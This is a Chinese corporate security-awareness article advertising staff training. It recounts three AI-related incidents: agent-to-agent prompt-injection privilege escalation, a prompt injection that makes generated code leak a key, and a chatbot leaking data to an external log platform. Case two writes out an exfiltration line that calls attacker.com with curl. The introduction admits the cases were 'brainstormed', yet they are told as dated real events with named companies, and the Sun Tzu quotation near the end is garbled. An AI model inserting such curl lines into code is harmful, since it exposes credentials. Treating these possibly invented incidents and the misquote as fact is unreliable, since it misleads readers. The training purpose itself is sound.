“防微杜渐,未雨绸缪。”——古人以此警示治理,今日的数字化、智能化环境让这句古训愈发贴切。
在无处不在的 AI 助手、自动化流水线、云端协作平台背后,潜伏着前所未有的攻防博弈。今天,我们不妨先把思维的齿轮转得更快一点,头脑风暴出 三起极具教育意义的典型安全事件,让每位同事在案例中看清风险点、感受危害,并以此为镜,积极投身即将开展的信息安全意识培训。
案例一:Gemini AI 代理对代理(Agent‑to‑Agent)攻击——低权诱导高权,供应链被“劫持”
事件概述
2026 年 6 月,安全厂商 Pillar Security 在公开报告中披露,攻击者利用 Google ADK for Python 中的两类 AI 代理(低权限的 Gemini Assistant 与高权限的 Gemini Admin),构造了“代理对代理”的横向提权链路。攻击者先在 GitHub 拉取请求(Pull Request)中植入精心设计的提示词,引诱低权限代理在解析用户询问时自动生成并发送特制的 @Gemini CLI 指令。该指令被高权限代理接收后触发内部工作流,进而执行任意 shell 命令,窃取敏感配置、API 密钥,甚至修改 PR 内容以植入后门代码。
攻击路径细化
| 步骤 | 关键动作 | 安全失误 |
|---|---|---|
| 1 | 攻击者在 PR 描述中加入 “请使用 Gemini 自动检查代码风格” 并附带恶意提示 | 未对 PR 内容进行 AI 提示词审计 |
| 2 | 低权 Gemini Assistant 解析提示,自动调用 @Gemini run <payload> |
未限制低权代理的外部指令调用 |
| 3 | 高权 Gemini Admin 监听同一指令队列,错误信任低权代理的请求 | 权限边界缺乏强制隔离 |
| 4 | 高权代理在内部容器中执行攻击者的 shell 代码 | 容器逃逸防护不足 |
| 5 | 攻击者读取云端配置、修改代码、推送带后门的提交 | 缺乏对关键操作的多因素审批 |
教训提炼
- AI 代理不等同于“安全灰盒”。 低权代理若能触发高权代理的执行链,等同打开了一扇后门。
- 提示词(Prompt)审计不可或缺。 任何面向外部用户的交互入口,都必须对输入的自然语言进行威胁模型扫描。
- 最小权限原则(Least Privilege)必须在 AI 工作流中贯彻。 高权代理应仅响应经过身份验证、签名校验的请求,避免“信任传递”。
- 供应链安全需要全链路可追溯。 从 PR 提交到 CI/CD 执行,每一步都应记录审计日志,并加入异常行为检测。
案例二:AI 生成代码的“供应链注入”——ChatGPT 编写的恶意脚本悄然进入生产环境
事件概述
2025 年 11 月,某大型金融机构在内部开发平台上部署了自动化代码生成插件,插件调用 OpenAI ChatGPT 接口帮助业务同学快速生成 Python 数据处理脚本。业务方提交业务需求后,ChatGPT 根据模板返回代码,自动写入仓库并触发 CI 流水线。数周后,安全团队在渗透测试中发现,攻击者通过对 ChatGPT 的 提示注入(Prompt Injection),让模型在返回代码时附带隐藏的 Base64 编码的恶意 shell 脚本。该脚本在 CI 环境中被解码并执行,导致内部数据库的备份密钥被窃取。
攻击路径细化
| 步骤 | 关键动作 | 安全失误 |
|---|---|---|
| 1 | 攻击者在需求描述中加入 “请在代码中加入用于日志打印的调试函数” | 未对业务需求进行敏感词过滤 |
| 2 | ChatGPT 生成代码时误将调试函数实现为 os.system('curl http://attacker.com/steal?key='+DB_KEY) |
模型输出未经过安全审查 |
| 3 | 自动写入 Git 仓库,触发 CI,CI 对代码进行语法检查但未执行安全静态分析 | CI 流水线缺乏代码安全扫描 |
| 4 | CI 运行单元测试时执行了恶意 os.system,泄露关键凭证 |
测试环境与生产环境权限未严格隔离 |
| 5 | 攻击者利用泄露的密钥获取备份数据 | 关键凭证未采用硬件安全模块(HSM)管理 |
教训提炼
- AI 生成代码不等于“免审”。 任何由大模型输出的代码,都必须经过 安全静态分析(SAST)、动态行为监测 以及 人工复核。
- 提示注入是新型社会工程攻击。 攻击者通过巧妙构造业务需求,诱导模型生成带后门的代码,防护措施应包括 自然语言过滤 与 模型输出审计。
- CI/CD 环境的最小化权能 必不可少。测试容器不应拥有网络访问或对关键机密的读取权限。
- 凭证管理的硬件根基——不论是 API 密钥还是数据库凭证,都应使用硬件安全模块或云原生密钥管理服务进行封装。
案例三:企业内部聊天机器人泄露机密——“旁听”AI 助手的意外“耳目”
事件概述
2024 年 9 月,某跨国制造企业在企业微信中部署了 内部定制的 AI 助手,用于帮助员工快速查询产品规格、项目进度、内部制度等信息。该机器人通过调用私有模型并连接企业的内部知识库实现“零搜索”。然而,安全审计发现,机器人在处理包含 敏感项目代号 的对话时,会将原始文本 同步 发送至外部的日志聚合平台用于模型调优,导致项目代号外泄。更糟的是,攻击者通过拦截外部日志 API,读取这些信息后,进一步构造 社会工程钓鱼邮件,成功骗取高管的 VPN 凭证。
攻击路径细化
| 步骤 | 关键动作 | 安全失误 |
|---|---|---|
| 1 | 员工在机器人中询问 “最新的 X‑Project 原型测试进度?” | 机器人未对查询内容进行敏感级别标记 |
| 2 | 机器人将对话原文上报至第三方日志平台(用于模型微调) | 数据脱敏策略缺失 |
| 3 | 攻击者通过抓包获取日志 API 返回的完整对话 | API 鉴权未采用双因素 |
| 4 | 攻击者利用项目代号发起针对项目成员的钓鱼邮件 | 未对内部邮件系统进行 AI 生成内容识别 |
| 5 | 高管误点恶意链接,泄露 VPN 凭证,导致网络侧渗透 | VPN 多因素认证缺失,且登录监控不充分 |
教训提炼
- AI 助手的“学习渠道”必须安全可控。 所有用于模型微调的原始数据都必须进行 脱敏或伪匿名化,尤其是涉及业务机密。
- 对话内容的敏感度分级 必不可少。系统应在捕获用户输入时实时评估敏感级别,决定是否上报或保存。
- 外部日志/监控平台的访问控制 必须采用 零信任 原则,避免因日志泄露导致二次攻击。
- 钓鱼防御链路:在邮件网关加入 AI 生成文本检测,引入 行为分析 与 异常登录提醒。
由案例看当下的安全挑战:无人化、智能化、数字化的融合
“信息之海,波涛汹涌;”
“智能之舟,若无舵手,易翻覆。”
1. 无人化:机器人成为业务主角,人与机器的信任边界被重新绘制
- 机器人巡检、无人仓库、自动化客服 已成为常态。机器人本身的固件、算法更新若缺乏签名校验,便是攻击者潜伏的入口。
- 案例一中的 AI 代理正是 “无人化” 环境下的典型——机器人互相调用,权限链条不清晰,使攻击者能够在 “无人看守” 的场景中完成提权。
2. 智能化:生成式 AI 与大模型的广泛落地,带来“代码即服务”新范式
- 案例二展示了 “AI 代码生成” 的潜在风险。随着 Copilot、Claude、Gemini 等工具渗透到开发全流程,提示注入、模型漂移 成为安全团队的新焦点。
- 智能化的优势在于提升效率,但如果缺乏 AI 输出审计、模型安全治理,极易沦为攻击者的“武器池”。
3. 数字化:企业数据流向云端、API 化、微服务化,攻击面呈指数级增长
- 案例三凸显 “数据脱敏不足” 与 API 零信任缺失 的危害。数字化使得 数据跨系统、跨平台 传递,任何一个环节的失误都可能导致全局泄露。
- 当 企业内部知识库、CI/CD、运维平台 均以 API 方式对外提供服务时,身份认证、访问审计、最小权限 必须成为硬性要求。
4. 融合趋势的安全底色:“可信计算 + 零信任 + AI 赋能监管”
- 可信执行环境(TEE):在机器人/容器中使用硬件根信任,确保代码在受保护的内存中运行。
- 零信任网络(ZTNA):每一次服务调用都要进行身份验证、策略评估,即便是内部系统也不例外。
- AI 赋能安全:利用行为分析模型实时监测异常指令、异常数据流;使用大模型对提示词进行自动安全审计,实现“AI 审计 AI”。
呼吁:让每位同事成为信息安全的第一道防线
1. 培训的价值——从“被动防御”到“主动预警”
| 培训模块 | 关键收获 | 与日常工作关联 |
|---|---|---|
| AI 代理安全原理 | 理解代理间的信任链、最小权限模型 | 在使用任何内部 AI 助手时,能快速判断是否需要二次审批 |
| 生成式 AI 代码审计 | 学会使用 SAST/DAST 工具、手动审查提示词 | 开发时能在提交代码前捕获潜在后门 |
| 数据脱敏与日志安全 | 掌握敏感信息分类、加密、匿名化技术 | 在写日志或上报监控时,避免泄露业务机密 |
| 零信任实践 | 了解 API 访问控制、动态凭证、会话隔离 | 在跨系统调用时,主动检查凭证有效期与授权范围 |
| 红蓝对抗演练 | 亲身体验攻击路径,理解防御薄弱环节 | 通过实战演练提升对异常行为的敏感度 |
“知之者不如好之者,好之者不如乐之者。”——孔子。
只要我们把安全当成工作中的乐趣,而非负担,信息安全意识培训就会成为 “自我增长的加速器”。
2. 培训方式——贴合现代工作节奏的多元交付
- 线上微课+实战 Lab:每期 15 分钟微课,配套 30 分钟实验环境,随时随地可练。
- 案例研讨会:围绕上述三大案例展开分组讨论,鼓励职工提出 “如果你是防御者,你会怎么做?” 的思考。
- 安全挑战赛(CTF):在内部平台设置 “AI 代理夺旗” 赛道,获胜者可获得 “安全先锋徽章”。
- 每日安全小贴士:通过企业微信、邮件推送 200 字左右的安全要点,形成 碎片化记忆。
3. 参与方式——简单三步走
- 登录 iThome 企業安全平台(已在公司內網統一入口),点选 “信息安全意识培训”。
- 选择适合自己的学习路径(开发、运维、业务),完成报名。
- 预留 2 小时/周,完成微课观看与 Lab 实操,最后提交学习心得即可获得内部积分奖励。
“千里之行,始于足下”。 让我们从今天的学习开始,为企业的数字化转型筑起不可逾越的安全堡垒。
结语:让安全成为组织的“软实力”
在无人化、智能化、数字化交织的今天,安全不再是 IT 部门的专属职责,而是每位员工的共同使命。正如《孙子兵法》所言:“上兵伐謀,其次伐兵,其次伐城,其次伐卵。”
对抗 AI 代理的隐蔽提权、阻止生成式代码的暗藏后门、避免聊天机器人的信息泄漏,都是 “伐謀” 的层面——掌握信息、断绝攻击者的策划空间。
请大家牢记:
- 审慎对待每一次 AI 交互,不随意放行未知指令。
- 每行代码、每段对话,都可能是潜在的攻击入口,必须经过安全审计。
- 持续学习、主动报告,让安全意识像呼吸一样自然。
让我们在即将开启的培训中相聚,用知识点燃防御的火焰,用行动抵御未来的“AI 变种”。只要每个人都把安全放在心中,企业的数字化道路便会更加稳健、更加光明。

让安全成为组织的软实力,让每位同事都是最可靠的防线!
作为专业的信息保密服务提供商,昆明亭长朗然科技有限公司致力于设计符合各企业需求的保密协议和培训方案。如果您希望确保敏感数据得到妥善处理,请随时联系我们,了解更多相关服务。
- 电话:0871-67122372
- 微信、手机:18206751343
- 邮件:info@securemymind.com
- QQ: 1767022898

